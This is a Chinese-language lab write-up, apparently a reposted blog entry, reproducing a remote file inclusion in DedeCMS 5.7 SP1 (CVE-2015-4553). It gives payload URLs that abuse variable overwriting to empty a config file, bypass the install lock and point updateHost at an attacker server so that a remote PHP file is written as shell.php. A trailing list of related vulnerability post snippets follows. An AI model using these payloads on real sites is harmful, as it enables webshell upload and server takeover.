2. 程式人生 > >DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

阿新 發佈:2019-08-14

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

一、漏洞描述

該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。

二、漏洞影響版本

DeDeCMS < 5.7-sp1,包括5.7 sp1版本

三、漏洞環境搭建

1、下載DeDeCMS V5.7 SP1,然後放到phpstudy環境下的www目錄下,然後瀏覽器訪http://192.168.10.171/dedecms/uploads/install/index.php

  

2、點選我已閱讀並繼續。然後是環境檢測,儲存預設即可

  

3、接下來是引數配置,需要設定的只有資料庫密碼,把自己的密碼填上去就行了

  

4、然後就把環境搭好了

  

四、漏洞復現

1、檢視/install/index.php原始碼,發現存在變數覆蓋漏洞,該程式碼的意思是將get,post或者cookie方式傳入的值通過foreach以鍵值對的方式輸出,例如在url中輸入?str=hello,則$_k的值就是str,$_v的值就是hello,所以${$_k}就是$str, 後面的RunMagicQuotes函式在另一個檔案中定義的,大致就是對引數進行過濾然後返回引數內容。

  

  

2、嘗試通過變數覆蓋重灌網站,瀏覽器訪問

  

3、變數覆蓋後,直接進入安裝介面,但是由於安裝鎖的存在不能繼續重新安裝,除非刪除安裝鎖http://192.168.10.171/dedecms/uploads/install/index.php?insLockfile=1

  

4、只有變數覆蓋暫時還不夠,繼續瀏覽程式碼,發現最後幾行程式碼

  

4.1、這段程式碼首先包含了/data/admin/config_update.php檔案, 這裡定義了變數updateHost

檔案內容如下: 

  

4.2、繼續看373-387行程式碼,$updateHost與dedecms/demodata.{$a_lang}.txt拼接為字串,並利用files_get_contents函式讀取demodata.{$s_lang}.txt檔案內容,最後將該檔案內容寫入到$install_demo_name引數中。

4.3、因此我們可以結合上面的變數覆蓋漏洞來進行遠端檔案包含,直接寫webshell。

5、由於$updateHost變數是引入進來的,所以不能直接進行覆蓋,需要先將config_update.php檔案清空再包含。

5.1、這時候可以利用fopen函式來實現,可以看到fopen中的引數是w,會直接重寫檔案,而file_get_contents讀取檔案失敗會返回NULL

  

5.2、然後利用fwrite函式,這裡可以利用變數覆蓋,將$s_lang隨意取名成不存在的檔名, $install_demo_name指向”../data/admin/config_update.php”,為了程式能夠執行到這裡,需要將$step設定為11,這樣就達到了清空config_update.php的目的。

構造payload: http://192.168.10.171/dedecms/uploads/install/index.php?step=11&s_lang=test&install_demo_name=…/data/admin/config_update.php

瀏覽器訪問,提示如下

  

5.3、檢視程式碼,發現這裡有一個判斷檔案是否存在(也就是判斷網站是否安裝)的條件,通過變數覆蓋漏洞將$insLockfile構造成任意不存在的檔案就可以繞過這個條件的限制

  

5.4、再次構造payload:

http://192.168.10.171/dedecms/uploads/install/index.php?step=11&s_lang=test&insLockfile=test&install_demo_name=../data/admin/config_update.php

  

5.5、此時可以看到config_update.php會發現已經變為0kb,空檔案

  

5.6、config_update.php檔案內容被清空之後,這時我們就可以控制updateHost引數了,這時我們就可以開始遠端檔案包含上傳我們想要上傳的檔案了

5.7、在kali上建立一個dedecms資料夾,然後建立一個demodata.gb2312.txt,寫入<?php phpinfo();?> ,然後開啟web服務

  

5.8、再次構造payload, install_demo_name改為要上傳的路徑,updateHost改為遠端目標機的IP

Payload如下:

http://192.168.10.171/dedecms/uploads/install/index.php?step=11&insLockfile=test&install_demo_name=../shell.php&updateHost=http://192.168.10.140/

瀏覽器訪問,出現介面說明寫入成功

  

5.9、檢視是否上傳成功,確定上傳成功

  

6、瀏覽器訪問上傳的shell.php

  

 

 

 

 

-------------------------------------------------------------------------------------------

參考: https://www.cnblogs.com/s1ye/p/9108780.

相關推薦

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553)

DedeCMS 5.7 sp1遠端檔案包含漏洞(CVE-2015-4553) 一、漏洞描述 該漏洞在/install/index.php(index.php.bak)檔案中,漏洞起因是$$符號使用不當,導致變數覆蓋,以至於最後引起遠端檔案包含漏洞。 二、漏洞影響版本 DeDeCMS < 5.7-

18.phpmyadmin 4.8.1 遠端檔案包含漏洞CVE-2018-12613)

phpmyadmin 4.8.1 遠端檔案包含漏洞(CVE-2018-12613) phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯, 通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 受影響版本: phpMyAdmin 4.8.0和4

dedecms 5.7 任意前臺使用者修改漏洞

一、 啟動環境 1.雙擊執行桌面phpstudy.exe軟體 2.點選啟動按鈕,啟動伺服器環境 二、程式碼審計 1.雙擊啟動桌面Seay原始碼審計系統軟體 2.點選新建專案按鈕,彈出對畫框中選擇(C:\phpStudy\WWW\ dedecms v57),點選確定 漏

phpmyadmin 遠端檔案包含漏洞CVE-2018-12613)

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。 漏洞記錄 漏洞編號:CVE-2018-12613 受影響版本:phpMyAdmin 4.8.0和

dedecms 5.7 sp1版 關於附件上傳後,附件地址回撥失敗的BUG修復

在使用dedecms 5.7 sp1版 時,發現附件上傳後,回撥時會失敗,必須,重新選擇,才能呼叫到上傳的附件,當附件很多時,會很恐怖的。 經過對dedecms5.7的分析,發現是上傳時,沒有傳值導致的。 解決辦法: 1、include目錄下dialog下select_

phpMyAdmin 4.0.1--4.2.12 本地檔案包含漏洞(CVE-2014-8959)

利用條件: 1.登入phpmyadmin後臺 2.需要截斷 滿足第二個條件  php版本必須 <5.3.4  搭建環境 我們在www目錄下放置phpinfo.txt 和 phpadmin4.0.3 phpmya

HTTP.sys 遠端執行程式碼漏洞(CVE-2015-1635)(MS15-034)簡單測試

        無意中用掃描器掃到了HTTP.sys 漏洞,因為之前寫過python單poc指令碼,感覺exp應該也是存在的。本著常識的心態找一下利用程式碼,如果能提權是再好不過的。    根據網上的記

CVE-2018-20129:DedeCMS V5.7 SP2前臺檔案上傳漏洞

一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺檔案上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟體連結: http://updatenew.dedecms.com/base-v57/packa

CVE-2018-20129-——DedeCMS V5.7 SP2前臺檔案上傳漏洞

0x01 漏洞概述 Desdev DedeCMS(織夢內容管理系統)是中國卓卓網路(Desdev)科技有限公司的一套開源的集內容釋出、編輯、管理檢索等於一體的PHP網站內容管理系統(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dial

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129)

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129) 一、漏洞描述 織夢內容管理系統(Dedecms)是一款PHP開源網站管理系統。Dedecms V5.7 SP2版本中的uploads/include/dialog/select_images_post.php檔案存在檔案上傳漏洞

DVWA_File Inclusion 檔案包含 遠端檔案包含拿webshell

    MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );

BugkuCTF檔案包含漏洞

雖然是參考別人的,但是,為了能夠靈活使用工具啥的,拓展一下還是每天來一題CTF吧。 writeup正版點這裡 題目所給的程式碼塊 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "va

檔案包含漏洞原理

什麼是檔案包含漏洞: PHP檔案包含漏洞的產生原因是在通過PHP的函式引入檔案時,由於傳入的檔名沒有經過合理的校驗,從而操作了預想之外的檔案,就可能導致意外的檔案洩露甚至惡意的程式碼注入。最常見的就屬於本地檔案包含(Local File Inclusion)漏洞了。 程式開發人員一般會把重複

檔案包含漏洞詳解

原文作者: m4r10 http://hi.baidu.com/m4r10 轉載請註明版權 &&&遠端檔案包含漏洞&&& 一、 什麼才是"遠端檔案包含漏洞"?回答是:伺服器通過php的特性(函式)去包含任意檔案時,由於要包含的這個檔案來源過

Dedecms 5.7 SP2後臺getshell

Dedecms 5.7 SP2後臺getshell 前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇關於dedecms後臺getshell的文章,所以也自己動手復現一下,這樣以後遇到了也更容易上手。該漏洞涉及的版本是dedecms的最新版吧,下載地址:

Kali學習筆記31:目錄遍歷漏洞檔案包含漏洞

文章的格式也許不是很好看,也沒有什麼合理的順序 完全是想到什麼寫一些什麼,但各個方面都涵蓋到了 能耐下心看的朋友歡迎一起學習,大牛和槓精們請繞道   目錄遍歷漏洞: 應用程式如果有操作檔案的功能,限制不嚴格會導致可以訪問到WEB目錄意外的檔案 目錄遍歷漏洞和檔案包含漏洞本質以及利用方法一

bugku-flag在index裡(本地檔案包含漏洞+php偽協議)

題目地址http://123.206.87.240:8005/post/ click點選進去 從 url地址可以猜測,需要用到 php://filter偽協議。 用法: php://filter/read=convert.base64encode/resourc

bugku-檔案包含2(檔案包含漏洞)

本文介紹三種方法,還會講到這道題菜刀的連線。  進入題目頁面,沒有什麼特別的,只能右鍵檢視原始碼,發現提示需要跳轉到 upload.php上傳頁面     方法一: ①新建一個txt檔案寫入  <script l

php://filter(檔案包含漏洞利用)

 檔案包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 篩選過濾應用:  1、 字串過濾器: string.rot13 對字串執行ROT13轉換 string.to

【程式碼審計】CLTPHP_v5.5.3後臺任意檔案刪除漏洞分析

  0x00 環境準備 CLTPHP官網:http://www.cltphp.com 網站原始碼版本:CLTPHP內容管理系統5.5.3版本 程式原始碼下載:https://gitee.com/chichu/cltphp 預設後臺地址: http://127.0.0.1/admin/log